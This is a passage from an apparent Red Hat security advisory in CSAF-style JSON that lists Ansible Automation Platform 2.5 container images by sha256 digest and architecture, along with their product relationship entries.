"purl": "pkg:oci/ansible-python-base-rhel8@sha256%3A82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774398095"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ansible-python-toolkit-rhel8@sha256%3A34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774401376"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8@sha256:48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel8@sha256%3A48f4971662ddb841e25bb610f72ef5f37eddf482b117786595d80d0931448236?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774401023"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/controller-rhel8-operator@sha256:57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/controller-rhel8-operator@sha256%3A57bf7919da3de08961e4c151b08dab1c756353a4040d0dd66feb72fcfe1cc8ce?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774167244"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8@sha256:985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel8@sha256%3A985cf2d3da53a542a87d98e4b698f53cf9b99e1a09e86b206f42c96833c2b35c?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774399338"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/eda-controller-rhel8-operator@sha256:a23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-rhel8-operator@sha256%3Aa23c10d8ea852924e8c89a80cb561b2ed9dbacb13257401181b9b13ddf6786ee?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774167149"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/eda-controller-ui-rhel8@sha256:bd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/eda-controller-ui-rhel8@sha256%3Abd47ed866c9bee7c22e7fafcb959df87f64abdbea9f38603a377216f99be3b43?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774484106"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8@sha256:0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel8@sha256%3A0b65799b577e98beaa59b850028bbfc2d2b112465d1661cd6ab90fb0dd296695?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774352226"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/gateway-rhel8-operator@sha256:b104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gateway-rhel8-operator@sha256%3Ab104daa98ef64f2be52d0066ca490a98ef3380a4516038711972be8c01a16571?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774167258"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/gateway-proxy-rhel8@sha256:6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/gateway-proxy-rhel8@sha256%3A6624a8e702ff2bc3f07b63a8fec42034c48b41bb187818fd4f2dd8a8f60766cb?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774399567"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8@sha256:1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel8@sha256%3A1d1f1078e7a5d916a6df61d83b6c38512a4f1e6ca71d91212fd539aa3be4d8ed?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774587114"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/hub-rhel8-operator@sha256:0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/hub-rhel8-operator@sha256%3A0997e7c2515f817d857c9c3dc157f7adec41553adfc3a22913bd65c90b1c9924?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774167254"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/hub-web-rhel8@sha256:20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/hub-web-rhel8@sha256%3A20537bc868859605ba1a227b8ffaa4523c03b67093e71e910d8cb3b8fbe0392d?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774589220"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/de-minimal-rhel8@sha256:f250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/de-minimal-rhel8@sha256%3Af250376b2a72ff2e0bd866bbd8142c5e071218351ad62c52cd7b7a6f3baab026?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774405413"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/de-supported-rhel8@sha256:0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/de-supported-rhel8@sha256%3A0a10e9afd9c3d555a36db84f938973f14fb099164b1ba5068f9e5a9cfec51f01?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774409723"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/ee-minimal-rhel8@sha256:c87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ee-minimal-rhel8@sha256%3Ac87feb6c292b8f95cc840237e3a498eaa3198447f11bb3dd652818e1128bf4a4?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774404039"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/ee-supported-rhel8@sha256:6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/ee-supported-rhel8@sha256%3A6547c593ea515750150478d442e17f113fb76ec611f6d7c2ff62223e1742a083?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774446347"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:df33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:df33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/platform-resource-rhel8-operator@sha256:df33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-rhel8-operator@sha256%3Adf33172c1cb33952183c80ab0f86c5f414a5103b9eb0757f744103678a6992ff?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774167608"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/platform-resource-runner-rhel8@sha256:b4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/platform-resource-runner-rhel8@sha256%3Ab4bf1128add34cd02dbb769b2445af2491cb1fe3b23d8aaecdff3044ecb889be?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774449833"
}
}
},
{
"category": "product_version",
"name": "registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le",
"product": {
"name": "registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le",
"product_id": "registry.redhat.io/ansible-automation-platform-25/receptor-rhel8@sha256:e34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1_ppc64le",
"product_identification_helper": {
"purl": "pkg:oci/receptor-rhel8@sha256%3Ae34860aa425dc582c6e2214d5762a31e84f62d905469b3f130fc3980a03c36b1?arch=ppc64le\u0026repository_url=registry.redhat.io/ansible-automation-platform-25\u0026tag=1774399119"
}
}
}
],
"category": "architecture",
"name": "ppc64le"
}
],
"category": "vendor",
"name": "Red Hat"
}
],
"relationships": [
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:0f8839e5aee29a659fc87dbe1974d52807b02232b12bfae0a9ee75f72f6822d8_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:cbed194c572c59551a2b73e61d8c3821df77d5a9ca7d2275062c439996a24eb4_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:f501719d54fc49e168385702bb0e1d8432b65f129a56a8fe184557a715956196_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/aap-must-gather-rhel8@sha256:fe250f135f03aecf8489c1cee9721b9e48549e19d5a609a3d3284fe7d758a34d_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:6fd7c632b981a1b0593c6af234c4b40d1046eabebe41ce29f75e1e010e92226a_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:b8d2a7da8627fa6a020330453c9fee31ba37a8eddd2d014fafa5bf3ed838fb5e_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:c264a07ccc7020902897cc9420a76dc590431596fc74696b57e42c2cc658a3f7_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/ansible-builder-rhel8@sha256:de9acb254c64d4b5f060867ac81c3c7b92da197bd62914705f47f81c719000f9_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:299e584db6227b51630ff777864b19113e8a1ea8100aa5c1bde092f730f35911_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:3aae092b74e73969f4328e406f804297e44130fea3232db3403db98463e42d9c_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:b77247eccd37c9bc29631142605c6fab3af9d23ebf82b43f049664e44193d377_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/ansible-dev-tools-rhel8@sha256:f1eb81b968bdee5bbfa48e25718ac574bdda09c2acf726d9f058e0643585d59d_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:009336407c386ffb1f5f1bdb7a38256e73b8b2ec97036f8ab84e7293f517ef8e_s390x",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:82e4da659d4bbf036bafee5f598602ec32b7b5f8d3d595287dcf418288bf2147_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:8ee6e0938cc2189984009da95ebd6fb4f5946cf9e1f7ef7aae8d6f40dfc7ab36_amd64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/ansible-python-base-rhel8@sha256:90d90e31d0afe833778743baf4eb3527402a65c30fdcce149ff8d4820faa3781_arm64",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le"
},
"product_reference": "registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:34bfde79221d2f824177f72d68a877b63bfe88b1f0562741a2dc212f83cb4e62_ppc64le",
"relates_to_product_reference": "Red Hat Ansible Automation Platform 2.5"
},
{
"category": "default_component_of",
"full_product_name": {
"name": "registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64 as a component of Red Hat Ansible Automation Platform 2.5",
"product_id": "Red Hat Ansible Automation Platform 2.5:registry.redhat.io/ansible-automation-platform-25/ansible-python-toolkit-rhel8@sha256:c25356366526086b2e85274793b8e9dadf1a04d35515087d4421c74bb9b4bacf_amd64"
},
